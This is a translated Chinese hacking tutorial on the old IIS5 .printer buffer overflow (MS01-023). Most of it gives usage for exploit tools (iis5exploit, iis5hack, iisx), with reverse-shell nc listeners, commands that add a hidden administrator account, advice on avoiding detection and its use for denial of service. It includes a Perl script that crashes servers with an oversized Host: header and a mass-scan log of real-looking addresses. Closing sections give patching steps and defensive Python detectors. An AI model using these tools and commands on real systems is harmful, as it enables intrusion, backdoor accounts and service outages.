Examples of domestic (Chinese) .printer remote overflow attack tools
1. Xiao Rong's iis5exploit
Strictly speaking, this program was not written by Xiao Rong; it is his optimized build of the jill.c code. Still, it is a genuinely good tool and is recommended.
Http://www.netxeyes.com/IIS5Exploit.zip
The archive contains three files: iis5exploit.exe, nc.exe and readme.txt.
IIS5 .printer exploit instructions
--------------- The following is the content of readme.txt ---------------
This program applies to the English version of IIS 5.0.
1. First, open a listening port with nc on your own machine:
C:\> nc -l -p 99
2. Run iis5exploit:
D:\> jill XXX.XXX 211.152.188.1 333
============ IIS5 English version .printer exploit ==============
=== Written by assassin 1995-2001. http://www.netXeyes.com ====
Connecting 211.152.188.1... OK.
Send shell code... OK
IIS5 shell code send OK
Here 211.152.188.1 is your own local IP address.
Wait a moment. If the overflow succeeds, the nc listener on your machine shows:
C:\> nc -l -p 99
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\>
You can now execute commands, for example:
C:\> net user hack password /add
The command completed successfully.
C:\> net localgroup administrators hack /add
This creates a user named hack with the password password and puts it in the Administrators group.
-----------------------------------------------------------------
Notes:
Using this tool actually requires two MS-DOS windows. First run nc -l -p 99; you can of course choose another port, and I recommend a high one, so that other people scanning your machine while you are testing do not interfere with the test. Xiao Rong must have written the readme in a hurry, because the description of how to run iis5exploit is incomplete. The correct format is:
iis5exploit <target host IP> <attacker IP> 99 (the port must match the one your nc is listening on)
For a high success rate, first make sure the target is running the HTTP/HTTPS service on Win2k. You can telnet to port 80 of the target and request index.htm, then judge from the response (the Server: header of IIS 5.0) whether the other side is Microsoft Windows 2000 [Version 5.00.2195]; or you can use the scanprinter tool provided by eyas to scan for it.
2. iis5hack, provided by sunx.org
Http://www.sunx.org/mysoft/iis5hack.zip
Running parameters:
iis5hack <target host IP> <web port, normally 80> <version>
where <version> is one of:
Chinese Win2k: 0
Chinese Win2k SP1: 1
English Win2k: 2
English Win2k SP1: 3
Japanese Win2k: 4
Japanese Win2k SP1: 5
E:\hack\print> iis5hack 63.110.130.66 80 3
Iis5 remote .printer overflow. writen by sunx
Http://www.sunx.org
For test only, dont used to hack,
Connecting...
Sending...
Now you can telnet to 99 Port
Good luck
C:\> telnet 63.110.130.66 99
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Once in, what you do on the target is up to you. The advantage of this tool is that it covers the Chinese, English and Japanese versions of Win2k; the disadvantage is that after a successful overflow the IIS service on the target stops, so once you have the shell you must finish what you want to do quickly. If you take too long, both the shell and IIS die. In addition, the shell port on the target cannot be chosen freely.
When you leave the telnet session, remember to exit normally; otherwise IIS on the target also dies.
During my tests I found that the other side's IIS died in only two or three minutes.
The tool also works quite well as a denial-of-service attack.
3. cniis and iisx, provided by isno.yeah.net
isno's latest .printer exploit is iisx, an upgraded version of cniis. Its usage text reads:
Usage: iisx <target host> <SP> <-p | -a | -r attackhost attackport>
SP: 0 --- the target has no service pack installed, 1 --- the target has SP1 installed
Three attack methods are provided for the IIS5 .printer vulnerability:
-p --- run iisx 66.77.88.99 0 -p against the target:
opens port 7788 on 66.77.88.99; then telnet 66.77.88.99 7788 directly.
-a --- run iisx 66.77.88.99 0 -a against the target:
adds an administrator account Hax on 66.77.88.99, with the password also Hax;
you can then connect with net use \\66.77.88.99\IPC$ "Hax" /user:"Hax".
-r --- reverse connection (like the jill method). For example:
run nc -vv -l -p 5432 on 111.222.333.444,
then run iisx 66.77.88.99 0 -r 111.222.333.444 5432 against the target;
the connection from 66.77.88.99 then appears on 111.222.333.444.
---------------------------------
I have not tested this tool very much, but its first method is the same as sunx's iis5hack, differing only in the fixed port the overflow opens for telnet. I have never liked fixed overflow ports: at the very least, if someone else scans the same host while you are testing, your activity is easy to spot.
The second method works only against administrators with poor security skills: creating a superuser account whose user name and password are both Hax can only succeed where the administrator has not even enforced a minimum password length or special characters, so their level can be imagined.
The third method is similar to jill.c, so I will not describe it in detail.
4. Scanners for the .printer vulnerability
1. cgicheck, a scanner written by eyas
eyas is a good friend of mine, a very enterprising young man now working at a security company in China. After Microsoft's .printer vulnerability announcement he wrote a tool dedicated to scanning for the vulnerability, scanprinter. Because it was written in a hurry, the program could find the vulnerability, but custom scan threads and the timeout delay were not well implemented and it was awkward to use.
I had intended to introduce his scanprinter, but while I was writing this part he e-mailed me his new cgicheck, also a beta, a DOS command-line tool. From the file name you can see that he means to develop it into a CGI vulnerability scanner similar to twwwscan.
Now let's look at how it performs.
The following scan was run on an AMD 850 with 128 MB RAM, a 64k ISDN line and Win98SE.
E:\> cgicheck 203.212.4.1 203.212.4.255 100 4
[203.212.4.18] Has .printer mapped.
[203.212.4.19] Has .printer mapped.
[203.212.4.227] Has .printer mapped.
******* 100% wait 4 seconds to exit ********
[203.212.4.237] Has .printer mapped.
[203.212.4.238] Has .printer mapped.
All done.
Complete. Scan 254 targets use 15.8 seconds. Speed 16.1/s
The scan results show that the program has indeed improved a great deal. I recommend adding an option to let the user choose what gets scanned; after all, we do not need every CGI vulnerability scanned for (some are rarely seen in the wild, and including them only slows the scan down).
2. A Perl scanner
Let's look at the following scanning program written in Perl:
#!/usr/bin/perl
# Exploit by storm@stormdev.net
# Tested with success against Win2k IIS 5.0 + SP1
# Remote buffer overflow test for Internet Printing Protocol
# This code was written after eEye brought this issue up on Bugtraq.
use strict;
use warnings;
use Socket;

print "-- IPP - Microsoft IIS 5.0 vulnerability test by storm --\n";
if (not $ARGV[0]) {
    print qq~
    Usage: webexplt.pl <IP>
    ~;
    exit;
}
my $ip = $ARGV[0];
print "Sending exploit code to host: " . $ip . "\n";

# A GET for a non-existent .printer resource. The oversized Host: header
# (roughly 420 bytes, per eEye's advisory) is what overflows msw3prt.dll.
my @results = sendexplt("GET /NULL.printer HTTP/1.0\r\n"
                      . "Host: " . ("A" x 420) . "\r\n"
                      . "\r\n");
print "Results:\n";
if (not @results) {
    # A vulnerable server crashes and closes the connection without answering.
    print "The machine tested has the IPP vulnerability!\n";
}
print @results;

sub sendexplt {
    my ($pstr) = @_;
    my $target = inet_aton($ip) || die("inet_aton problems\n");
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0)
        || die("socket problems\n");
    # connect to the web server on TCP port 80
    if (connect(S, sockaddr_in(80, $target))) {
        select(S);
        $| = 1;          # unbuffered, so the request goes out at once
        print $pstr;
        my @in = <S>;    # read whatever the server sends back, if anything
        select(STDOUT);
        close(S);
        return @in;
    } else {
        die("Can't connect...\n");
    }
}
---------------------------------------------------------------
In fact this is a rather simple Perl scanner. The command format is webexplt.pl <IP>, and it tests only a single IP address: it sends a GET /NULL.printer HTTP/1.0 request with a very long Host: header to the target, and if the server closes the connection without answering, it reports the .printer vulnerability as present. Note that this is the overflow itself, not a passive check: a positive result also means the target's IIS service has just crashed, just as it does with the exploit tools above.
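As an added illustration (not code from the original page or from storm's script), here is the same request rebuilt in Python together with a small detector of the kind a defender could run over captured or logged HTTP requests. The point the script above does not show is that a legitimate request to a .printer resource carries an ordinary Host: header, so an oversized Host: on a .printer URI is the signature of the overflow attempt. The 256-byte flagging threshold and the 420-byte trigger length are assumptions of this example, and the sample requests are constructed inline.

```python
"""Request-side view of the .printer overflow test and a simple detector (added example)."""

from typing import Dict, Optional, Tuple

PRINTER_SUFFIX = ".printer"
# Ordinary Host: headers hold a host name, rarely more than a few dozen bytes,
# while the overflow needs a Host: value of roughly 420 bytes. 256 is a
# threshold chosen for this example, not a value from the original page.
HOST_LEN_THRESHOLD = 256


def build_request(host_header: str, uri: str = "/NULL.printer") -> bytes:
    """Build the HTTP/1.0 request that webexplt.pl sends.

    With a normal host_header this is a harmless request for a non-existent
    .printer resource; with host_header = "A" * 420 it is the overflow trigger.
    """
    return f"GET {uri} HTTP/1.0\r\nHost: {host_header}\r\n\r\n".encode("latin-1")


def parse_request(raw: bytes) -> Optional[Tuple[str, str, Dict[str, str]]]:
    """Split a raw request into (method, uri, headers); None if the request line is malformed.

    Accepts both CRLF and bare LF line endings, since the original Perl test uses bare LF.
    """
    text = raw.replace(b"\r\n", b"\n").decode("latin-1", errors="replace")
    lines = text.split("\n\n", 1)[0].split("\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    method, uri, _version = parts
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, uri, headers


def is_printer_overflow_attempt(raw: bytes) -> bool:
    """True for a request to a .printer resource whose Host: header is suspiciously long."""
    parsed = parse_request(raw)
    if parsed is None:
        return False
    _method, uri, headers = parsed
    path = uri.split("?", 1)[0].lower()      # IIS treats the extension case-insensitively
    return path.endswith(PRINTER_SUFFIX) and len(headers.get("host", "")) >= HOST_LEN_THRESHOLD


# Constructed sample requests for the demonstration; not captured traffic.
SAMPLES: Dict[str, bytes] = {
    "normal page": build_request("www.example.com", "/index.htm"),
    "mapping probe": build_request("www.example.com"),   # short Host: header, harmless
    "overflow test": build_request("A" * 420),            # what webexplt.pl sends
}


def classify_samples() -> Dict[str, bool]:
    """Which of the constructed samples the detector flags."""
    return {name: is_printer_overflow_attempt(req) for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, flagged in classify_samples().items():
        print(f"{name:14s} -> {'ATTACK' if flagged else 'ok'}")
```

Run without arguments it classifies the three constructed requests; only the one with the 420-byte Host: header is flagged. To use the detector on real traffic, feed is_printer_overflow_attempt() the raw bytes of each request reassembled from a capture.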
3. Other scanners: easyscan from www.netguard.com.cn and X-Scan from www.xfocus.org have released versions that scan specifically for the .printer vulnerability; you can try them as well.
5. Fixing the vulnerability
The best solution is to install Microsoft's patch for this vulnerability (security bulletin MS01-023):
Patch:
Http://www.microsoft.com/Downloads/...ReleaseID=29321
If you cannot obtain the patch, you can also configure the server by hand:
Control Panel > Administrative Tools > Internet Services Manager; right-click your site (mine, for example, is badboy-f5gzewyd) > Properties > Home Directory > Configuration > App Mappings; find .printer and remove it.
You lose the Internet Printing (web printing) function, but that is better than having it used to break into the system. The mapping is configured per web site (or in the master WWW properties that sites inherit), so check every site on the server.
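As an added example (not part of the original page and not one of the tools described above), here is a non-destructive way to check whether a server still exposes the .printer mapping. It serves both purposes this page covers: scanning a range for the mapping, as cgicheck reports with "Has .printer mapped", and confirming afterwards that the patch or the mapping removal took effect. Unlike the Perl test, it sends a short, well-formed request for a non-existent .printer resource and classifies the answer instead of crashing the server. The classification rule is an assumption of this example: a 404 means nothing handles .printer, and a body containing "Error in web printer install" (the text the msw3prt.dll handler is reported to return for a missing printer) means the mapping is present. A present mapping on a patched server is exposed attack surface but not the vulnerability itself; this check does not tell the two apart. The sample responses are constructed.

```python
"""Non-destructive check for the IIS 5 .printer (msw3prt.dll) mapping (added example)."""

import socket
import sys
from typing import Dict, Optional

# Body text the .printer ISAPI handler is reported to return for a
# non-existent printer. An assumption of this example; the page itself
# does not state what a mapped server answers.
MAPPED_MARKER = b"Error in web printer install"


def probe_request(host: str) -> bytes:
    """A well-formed HTTP/1.0 request for a .printer resource that does not exist.

    The Host: header is the real host name, a few dozen bytes at most, so the
    request exercises the mapping without approaching the ~420-byte Host:
    header that triggers the overflow.
    """
    return (f"GET /NULL.printer HTTP/1.0\r\nHost: {host}\r\n"
            f"Connection: close\r\n\r\n").encode("latin-1")


def status_code(response: bytes) -> Optional[int]:
    """HTTP status code from a raw response, or None if the status line is unusable."""
    status_line = response.split(b"\n", 1)[0].rstrip(b"\r")
    parts = status_line.split(b" ")
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        return None
    try:
        return int(parts[1])
    except ValueError:
        return None


def classify(response: Optional[bytes]) -> str:
    """Turn a raw response (None = could not connect) into a verdict string."""
    if response is None:
        return "unreachable"
    if not response:
        return "no-response"      # closed without data: the service may have died
    if MAPPED_MARKER in response:
        return "mapped"           # msw3prt.dll handled the request: attack surface present
    code = status_code(response)
    if code == 404:
        return "not-mapped"       # no handler for .printer: mapping removed or never present
    return f"unknown:{code}"      # anything else needs a human look


def probe(host: str, port: int = 80, timeout: float = 5.0) -> Optional[bytes]:
    """Send the probe to host:port and return the raw response; None if unreachable."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(probe_request(host))
            chunks = []
            try:
                while True:
                    data = sock.recv(4096)
                    if not data:
                        break
                    chunks.append(data)
            except socket.timeout:
                pass              # keep whatever arrived before the read timed out
            return b"".join(chunks)
    except OSError:
        return None


# Constructed responses standing in for four servers; not captured traffic.
SAMPLE_RESPONSES: Dict[str, Optional[bytes]] = {
    "mapping removed": (b"HTTP/1.1 404 Object Not Found\r\n"
                        b"Server: Microsoft-IIS/5.0\r\n\r\n<html>not found</html>"),
    "mapping present": (b"HTTP/1.1 500 Server Error\r\n"
                        b"Server: Microsoft-IIS/5.0\r\n\r\nError in web printer install"),
    "closed silently": b"",
    "host down": None,
}


def classify_samples() -> Dict[str, str]:
    """Verdicts for the constructed samples (what the demo prints without arguments)."""
    return {name: classify(resp) for name, resp in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Usage: python printer_probe.py host [host ...]   (probes real servers)
        for target in sys.argv[1:]:
            print(f"{target}: {classify(probe(target))}")
    else:
        for name, verdict in classify_samples().items():
            print(f"{name:16s} -> {verdict}")
```

Pass the host names of each web site on the server rather than only the IP address: the mapping is configured per site, and a site selected by Host: header can keep .printer even after it was removed from another.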